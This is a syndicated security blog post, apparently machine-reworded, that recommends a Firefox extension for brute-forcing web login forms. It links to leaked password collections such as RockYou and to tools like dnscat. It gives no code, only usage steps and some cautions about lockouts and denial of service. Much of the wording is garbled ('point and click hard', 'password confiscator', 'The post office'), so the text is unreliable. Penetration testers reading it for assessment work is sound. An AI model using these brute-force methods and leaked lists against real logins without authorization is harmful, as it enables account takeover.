Easy, airy, beautiful, password attack…


Bruting web forms are typically part of a web application assessment. We like to use Hydra, Medusa, or Wfuzz for this, but recently came across a tool that makes it much easier. It’s called fire force. It’s a Firefox extension that lets you point and click hard.

We ran it in our labs with about a 74% success rate, which means it correctly mapped the login parameters to the web form and returned the correct password to us (i.e. say it didn’t delete and kill our browser). So it’s not perfect, but we’re willing to forgive that for its ease of use. It is very simple. Give it a username, right click in the form password field, give it the text the login form gives on unsuccessful login and a brute force list. Be sure to read the documentation as you will need to use a separate firefox profile if you want to browse while using the tool (it’s a mem/cpu hogger). *note* We have not performed any code analysis on the extension, use it at your own risk in your lab.

Also, yesterday we tweeted about Ron Bowes from Skullsecurity.com password analysis and collection of password lists who are earning a lot. Ron has performed data analysis on some of the leaked password lists in recent years, such as RockYou, MySpace, and PhpBB. It also stores default password lists for many common industry tools, and even the password confiscator used to propagate. I’ll grab those lists if you don’t already have them, who knows how long they’ll stick around. Ron has actually been on a hot streak lately as he released an awesome tool called dnscat. He also made VMware guest stealing NSE scripts which we will post later

Remember brute force password is great as long as you don’t DOS the application/server. Also remember that just because it’s a web form doesn’t mean it’s not linked to another backend system (LDAP, etc.), so be aware that you can lock out users .

Also you might want to check out our article a bit back on password attacks here.

Get the fire force here

Get password lists here

Get DNScat here

Find Ron on Twitter: @iagox86


The post office Easy, airy, beautiful, password attack… appeared first on Security Aegis.

*** This is a syndicated blog from the Security Bloggers Network of Security Aegis Written by Security Aegis. Read the original post at: https://www.securityaegis.com/easy-breezy-beautiful-password-attacking/

Source link